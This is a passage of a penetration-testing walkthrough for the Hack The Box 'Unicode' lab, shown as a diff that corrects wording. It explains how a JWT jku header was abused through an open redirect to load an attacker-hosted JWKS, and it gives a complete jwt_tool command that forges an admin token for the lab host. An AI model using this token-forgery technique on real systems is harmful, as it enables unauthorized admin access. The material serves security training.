Rang3l2/HTB-Walkthroughs/Medium-Unicode.md

 ===============================================================

 ```

-Using the redirect endpoint it was possible for the tester to set the jku header to point to the redirect endpoint and set it to point to the testers host.
+Using the redirect endpoint it was possible for the tester to set the jku header to point to the redirect endpoint and in turn set it to point to the testers host.
 The "jwt_tools.py" is able to do this by creating a custom JWK, which the tester then hosted using a python http server.
 The tester changed the JWK to point to the testers host via the redirect "http://hackmedia.htb/static/../redirect?url=10.10.14.6/jwttool_custom_jwks.json".
-The tester also changed the user claim part of payload section to admin.
+The tester also changed the user claim part of the payload section to admin.
 ```

 ┌─[192.168.93.129]─[rang3r@parrot]─[~]
 └──╼ [★]$ python  '/home/rang3r/Documents/Tools/tools/web/jwt4/jwt_tool-master/jwt_tool.py'   eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9oYWNrbWVkaWEuaHRiL3N0YXRpYy9qd2tzLmpzb24ifQ.eyJ1c2VyIjoiam9obiJ9.fUXM6uoYSqrXOEEggGoVxSw5q53TeukNNAa0wREc9_dOqPUEr1F2SBsgFdu4P18PNE4yWVYeuSexsGEL3vwWYEKE4awLbzkJnPQPj2_qF3pyVKX0NYNRI-LjpIriPZ6Z-FgnoRo47vEKQG2yMLLSmaI8FS7wrpR7OL42I3USiBh3qPBz26ZwZmtwh7b12vyaFWRsBcybq0-3I-np8eg4DQS51_ZMMNvNxv3VIF8UD3PtBr3hK1iviyfK9ZiQbgiV8SKjfnpi3rat1NQcJRJ50A3VcbbHZZ2pqe-iYruXUZf8anz4PGODYXg3m7aEScBKK8eeqiZ0rKt7gT4lrkrp7A  -X s -ju http://hackmedia.htb/static/../redirect?url=10.10.14.6/jwttool_custom_jwks.json  -I -pc user -pv admin